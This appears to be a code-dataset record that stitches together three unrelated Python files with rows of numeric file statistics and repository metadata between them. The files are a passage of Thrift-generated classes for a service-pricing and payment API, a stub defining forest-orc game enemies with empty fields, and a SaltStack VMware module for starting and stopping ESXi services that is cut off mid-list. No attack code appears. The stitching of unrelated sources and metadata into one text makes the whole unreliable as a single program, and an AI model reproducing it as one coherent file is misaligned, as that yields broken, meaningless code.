thrift_spec = (
(0, TType.SET, 'success', (TType.STRUCT, (wpthrift_types.ttypes.ServiceDetails, wpthrift_types.ttypes.ServiceDetails.thrift_spec), False), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype28, _size25) = iprot.readSetBegin()
for _i29 in range(_size25):
_elem30 = wpthrift_types.ttypes.ServiceDetails()
_elem30.read(iprot)
self.success.add(_elem30)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('requestServices_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.STRUCT, len(self.success))
for iter31 in self.success:
iter31.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getServicePrices_args(object):
"""
Attributes:
- serviceId
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceId', None, None, ), # 1
)
def __init__(self, serviceId=None,):
self.serviceId = serviceId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceId = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getServicePrices_args')
if self.serviceId is not None:
oprot.writeFieldBegin('serviceId', TType.I32, 1)
oprot.writeI32(self.serviceId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class getServicePrices_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.SET, 'success', (TType.STRUCT, (wpthrift_types.ttypes.Price, wpthrift_types.ttypes.Price.thrift_spec), False), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.SET:
self.success = set()
(_etype35, _size32) = iprot.readSetBegin()
for _i36 in range(_size32):
_elem37 = wpthrift_types.ttypes.Price()
_elem37.read(iprot)
self.success.add(_elem37)
iprot.readSetEnd()
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('getServicePrices_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.SET, 0)
oprot.writeSetBegin(TType.STRUCT, len(self.success))
for iter38 in self.success:
iter38.write(oprot)
oprot.writeSetEnd()
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class selectService_args(object):
"""
Attributes:
- serviceId
- numberOfUnits
- priceId
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceId', None, None, ), # 1
(2, TType.I32, 'numberOfUnits', None, None, ), # 2
(3, TType.I32, 'priceId', None, None, ), # 3
)
def __init__(self, serviceId=None, numberOfUnits=None, priceId=None,):
self.serviceId = serviceId
self.numberOfUnits = numberOfUnits
self.priceId = priceId
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceId = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.I32:
self.numberOfUnits = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.priceId = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('selectService_args')
if self.serviceId is not None:
oprot.writeFieldBegin('serviceId', TType.I32, 1)
oprot.writeI32(self.serviceId)
oprot.writeFieldEnd()
if self.numberOfUnits is not None:
oprot.writeFieldBegin('numberOfUnits', TType.I32, 2)
oprot.writeI32(self.numberOfUnits)
oprot.writeFieldEnd()
if self.priceId is not None:
oprot.writeFieldBegin('priceId', TType.I32, 3)
oprot.writeI32(self.priceId)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class selectService_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.TotalPriceResponse, wpthrift_types.ttypes.TotalPriceResponse.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.TotalPriceResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('selectService_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class makePayment_args(object):
"""
Attributes:
- request
"""
thrift_spec = (
None, # 0
(1, TType.STRUCT, 'request', (wpthrift_types.ttypes.TotalPriceResponse, wpthrift_types.ttypes.TotalPriceResponse.thrift_spec), None, ), # 1
)
def __init__(self, request=None,):
self.request = request
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.STRUCT:
self.request = wpthrift_types.ttypes.TotalPriceResponse()
self.request.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('makePayment_args')
if self.request is not None:
oprot.writeFieldBegin('request', TType.STRUCT, 1)
self.request.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class makePayment_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.PaymentResponse, wpthrift_types.ttypes.PaymentResponse.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.PaymentResponse()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('makePayment_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginServiceDelivery_args(object):
"""
Attributes:
- serviceID
- serviceDeliveryToken
- unitsToSupply
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceID', None, None, ), # 1
(2, TType.STRUCT, 'serviceDeliveryToken', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 2
(3, TType.I32, 'unitsToSupply', None, None, ), # 3
)
def __init__(self, serviceID=None, serviceDeliveryToken=None, unitsToSupply=None,):
self.serviceID = serviceID
self.serviceDeliveryToken = serviceDeliveryToken
self.unitsToSupply = unitsToSupply
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceID = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.serviceDeliveryToken = wpthrift_types.ttypes.ServiceDeliveryToken()
self.serviceDeliveryToken.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.unitsToSupply = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginServiceDelivery_args')
if self.serviceID is not None:
oprot.writeFieldBegin('serviceID', TType.I32, 1)
oprot.writeI32(self.serviceID)
oprot.writeFieldEnd()
if self.serviceDeliveryToken is not None:
oprot.writeFieldBegin('serviceDeliveryToken', TType.STRUCT, 2)
self.serviceDeliveryToken.write(oprot)
oprot.writeFieldEnd()
if self.unitsToSupply is not None:
oprot.writeFieldBegin('unitsToSupply', TType.I32, 3)
oprot.writeI32(self.unitsToSupply)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class beginServiceDelivery_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.ServiceDeliveryToken()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('beginServiceDelivery_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class endServiceDelivery_args(object):
"""
Attributes:
- serviceID
- serviceDeliveryToken
- unitsReceived
"""
thrift_spec = (
None, # 0
(1, TType.I32, 'serviceID', None, None, ), # 1
(2, TType.STRUCT, 'serviceDeliveryToken', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 2
(3, TType.I32, 'unitsReceived', None, None, ), # 3
)
def __init__(self, serviceID=None, serviceDeliveryToken=None, unitsReceived=None,):
self.serviceID = serviceID
self.serviceDeliveryToken = serviceDeliveryToken
self.unitsReceived = unitsReceived
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 1:
if ftype == TType.I32:
self.serviceID = iprot.readI32()
else:
iprot.skip(ftype)
elif fid == 2:
if ftype == TType.STRUCT:
self.serviceDeliveryToken = wpthrift_types.ttypes.ServiceDeliveryToken()
self.serviceDeliveryToken.read(iprot)
else:
iprot.skip(ftype)
elif fid == 3:
if ftype == TType.I32:
self.unitsReceived = iprot.readI32()
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('endServiceDelivery_args')
if self.serviceID is not None:
oprot.writeFieldBegin('serviceID', TType.I32, 1)
oprot.writeI32(self.serviceID)
oprot.writeFieldEnd()
if self.serviceDeliveryToken is not None:
oprot.writeFieldBegin('serviceDeliveryToken', TType.STRUCT, 2)
self.serviceDeliveryToken.write(oprot)
oprot.writeFieldEnd()
if self.unitsReceived is not None:
oprot.writeFieldBegin('unitsReceived', TType.I32, 3)
oprot.writeI32(self.unitsReceived)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
class endServiceDelivery_result(object):
"""
Attributes:
- success
- err
"""
thrift_spec = (
(0, TType.STRUCT, 'success', (wpthrift_types.ttypes.ServiceDeliveryToken, wpthrift_types.ttypes.ServiceDeliveryToken.thrift_spec), None, ), # 0
(1, TType.STRUCT, 'err', (wpthrift_types.ttypes.Error, wpthrift_types.ttypes.Error.thrift_spec), None, ), # 1
)
def __init__(self, success=None, err=None,):
self.success = success
self.err = err
def read(self, iprot):
if iprot._fast_decode is not None and isinstance(iprot.trans, TTransport.CReadableTransport) and self.thrift_spec is not None:
iprot._fast_decode(self, iprot, (self.__class__, self.thrift_spec))
return
iprot.readStructBegin()
while True:
(fname, ftype, fid) = iprot.readFieldBegin()
if ftype == TType.STOP:
break
if fid == 0:
if ftype == TType.STRUCT:
self.success = wpthrift_types.ttypes.ServiceDeliveryToken()
self.success.read(iprot)
else:
iprot.skip(ftype)
elif fid == 1:
if ftype == TType.STRUCT:
self.err = wpthrift_types.ttypes.Error()
self.err.read(iprot)
else:
iprot.skip(ftype)
else:
iprot.skip(ftype)
iprot.readFieldEnd()
iprot.readStructEnd()
def write(self, oprot):
if oprot._fast_encode is not None and self.thrift_spec is not None:
oprot.trans.write(oprot._fast_encode(self, (self.__class__, self.thrift_spec)))
return
oprot.writeStructBegin('endServiceDelivery_result')
if self.success is not None:
oprot.writeFieldBegin('success', TType.STRUCT, 0)
self.success.write(oprot)
oprot.writeFieldEnd()
if self.err is not None:
oprot.writeFieldBegin('err', TType.STRUCT, 1)
self.err.write(oprot)
oprot.writeFieldEnd()
oprot.writeFieldStop()
oprot.writeStructEnd()
def validate(self):
return
def __repr__(self):
L = ['%s=%r' % (key, value)
for key, value in self.__dict__.items()]
return '%s(%s)' % (self.__class__.__name__, ', '.join(L))
def __eq__(self, other):
return isinstance(other, self.__class__) and self.__dict__ == other.__dict__
def __ne__(self, other):
return not (self == other)
| 35.018403 | 165 | 0.588677 | 10,779 | 106,561 | 5.594025 | 0.023008 | 0.015755 | 0.028359 | 0.022986 | 0.85575 | 0.818684 | 0.795516 | 0.781518 | 0.769628 | 0.76772 | 0 | 0.006647 | 0.309579 | 106,561 | 3,042 | 166 | 35.029915 | 0.812932 | 0.021011 | 0 | 0.826522 | 1 | 0 | 0.02881 | 0.003477 | 0 | 0 | 0 | 0 | 0 | 1 | 0.118849 | false | 0.006255 | 0.002919 | 0.037531 | 0.233528 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
79d9d4a880cdf1bf8d87e2d1dd0e1321eaaaee22 | 1,277 | py | Python | server/src/define_enemies/forest_orcs.py | jacksonsr45/project_game_rpg_server_python | b8a7750d5bcc6558431ac6ac831b1a3728651114 | [
"MIT"
] | null | null | null | server/src/define_enemies/forest_orcs.py | jacksonsr45/project_game_rpg_server_python | b8a7750d5bcc6558431ac6ac831b1a3728651114 | [
"MIT"
] | null | null | null | server/src/define_enemies/forest_orcs.py | jacksonsr45/project_game_rpg_server_python | b8a7750d5bcc6558431ac6ac831b1a3728651114 | [
"MIT"
] | null | null | null | __author__ = "jacksonsr45@gmail.com"
new_forest_orcs = {
'1': {
'name': 'little_forest_orcs',
'life': {
},
'recharge_time': {
},
'attack': {
},
'defense': {
},
'speed_attack': {
},
'move_speed': {
},
'dodge': {
},
'inventary': {
},
'set': {
},
'init_map': {
},
},
'2': {
'name': 'forest_orcs',
'life': {
},
'recharge_time': {
},
'attack': {
},
'defense': {
},
'speed_attack': {
},
'move_speed': {
},
'dodge': {
},
'inventary': {
},
'set': {
},
'init_map': {
},
},
'3': {
'name': 'big_forest_orcs',
'life': {
},
'recharge_time': {
},
'attack': {
},
'defense': {
},
'speed_attack': {
},
'move_speed': {
},
'dodge': {
},
'inventary': {
},
'set': {
},
'init_map': {
},
},
} | 12.278846 | 37 | 0.261551 | 63 | 1,277 | 4.936508 | 0.396825 | 0.128617 | 0.135048 | 0.212219 | 0.800643 | 0.800643 | 0.800643 | 0.800643 | 0.800643 | 0.800643 | 0 | 0.008961 | 0.563038 | 1,277 | 104 | 38 | 12.278846 | 0.548387 | 0 | 0 | 0.416667 | 0 | 0 | 0.243349 | 0.016432 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
8ddbd5450ba29ef566535c4ffe023660f9e01a87 | 26,621 | py | Python | src/saltext/vmware/modules/service.py | jain-prerna/salt-ext-modules-vmware-old | 89ea6dd77c6d5a35dc55c23adbdc361949a63057 | [
"Apache-2.0"
] | null | null | null | src/saltext/vmware/modules/service.py | jain-prerna/salt-ext-modules-vmware-old | 89ea6dd77c6d5a35dc55c23adbdc361949a63057 | [
"Apache-2.0"
] | null | null | null | src/saltext/vmware/modules/service.py | jain-prerna/salt-ext-modules-vmware-old | 89ea6dd77c6d5a35dc55c23adbdc361949a63057 | [
"Apache-2.0"
] | null | null | null | # SPDX-License-Identifier: Apache-2.0
import logging
import sys
import saltext.vmware.utils.vmware
from salt.utils.decorators import depends
from salt.utils.decorators import ignores_kwargs
log = logging.getLogger(__name__)
try:
# pylint: disable=no-name-in-module
from pyVmomi import (
vim,
vmodl,
pbm,
VmomiSupport,
)
# pylint: enable=no-name-in-module
# We check the supported vim versions to infer the pyVmomi version
if (
"vim25/6.0" in VmomiSupport.versionMap
and sys.version_info > (2, 7)
and sys.version_info < (2, 7, 9)
):
log.debug("pyVmomi not loaded: Incompatible versions " "of Python. See Issue #29537.")
raise ImportError()
HAS_PYVMOMI = True
except ImportError:
HAS_PYVMOMI = False
__virtualname__ = "vmware_service"
def __virtual__():
return __virtualname__
def _get_service_manager(host_reference):
"""
Helper function that returns a service manager object from a given host object.
"""
return host_reference.configManager.serviceSystem
def service_start(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Start the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to start the service.
If host_names is not provided, the service will be started for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_start my.esxi.host root bad-password 'ntpd'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_start my.vcenter.location root bad-password 'ntpd' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
"snmpd",
"vprobed",
"vpxa",
"xorg",
]
ret = {}
# Don't require users to know that VMware lists the ssh service as TSM-SSH
if service_name == "SSH" or service_name == "ssh":
temp_service_name = "TSM-SSH"
else:
temp_service_name = service_name
for host_name in host_names:
# Check if the service_name provided is a valid one.
# If we don't have a valid service, return. The service will be invalid for all hosts.
if service_name not in valid_services:
ret.update(
{host_name: {"Error": "{} is not a valid service name.".format(service_name)}}
)
return ret
host_ref = _get_host_ref(service_instance, host, host_name=host_name)
service_manager = _get_service_manager(host_ref)
log.debug("Starting the '{}' service on {}.".format(service_name, host_name))
# Start the service
try:
service_manager.StartService(id=temp_service_name)
except vim.fault.HostConfigFault as err:
msg = "'vsphere.service_start' failed for host {}: {}".format(host_name, err)
log.debug(msg)
ret.update({host_name: {"Error": msg}})
continue
# Some services are restricted by the vSphere License Level.
except vim.fault.RestrictedVersion as err:
log.debug(err)
ret.update({host_name: {"Error": err}})
continue
ret.update({host_name: {"Service Started": True}})
return ret
def service_stop(
host,
username,
password,
service_name,
protocol=None,
port=None,
host_names=None,
verify_ssl=True,
):
"""
Stop the named service for the given host or list of hosts.
host
The location of the host.
username
The username used to login to the host, such as ``root``.
password
The password used to login to the host.
service_name
The name of the service for which to set the policy. Supported service names are:
- DCUI
- TSM
- SSH
- lbtd
- lsassd
- lwiod
- netlogond
- ntpd
- sfcbd-watchdog
- snmpd
- vprobed
- vpxa
- xorg
protocol
Optionally set to alternate protocol if the host is not using the default
protocol. Default protocol is ``https``.
port
Optionally set to alternate port if the host is not using the default
port. Default port is ``443``.
host_names
List of ESXi host names. When the host, username, and password credentials
are provided for a vCenter Server, the host_names argument is required to tell
vCenter the hosts for which to stop the service.
If host_names is not provided, the service will be stopped for the ``host``
location instead. This is useful for when service instance connection information
is used for a single ESXi host.
verify_ssl
Verify the SSL certificate. Default: True
CLI Example:
.. code-block:: bash
# Used for single ESXi host connection information
salt '*' vsphere.service_stop my.esxi.host root bad-password 'ssh'
# Used for connecting to a vCenter Server
salt '*' vsphere.service_stop my.vcenter.location root bad-password 'ssh' \
host_names='[esxi-1.host.com, esxi-2.host.com]'
"""
service_instance = saltext.vmware.utils.vmware.get_service_instance(
host=host,
username=username,
password=password,
protocol=protocol,
port=port,
verify_ssl=verify_ssl,
)
host_names = _check_hosts(service_instance, host, host_names)
valid_services = [
"DCUI",
"TSM",
"SSH",
"ssh",
"lbtd",
"lsassd",
"lwiod",
"netlogond",
"ntpd",
"sfcbd-watchdog",
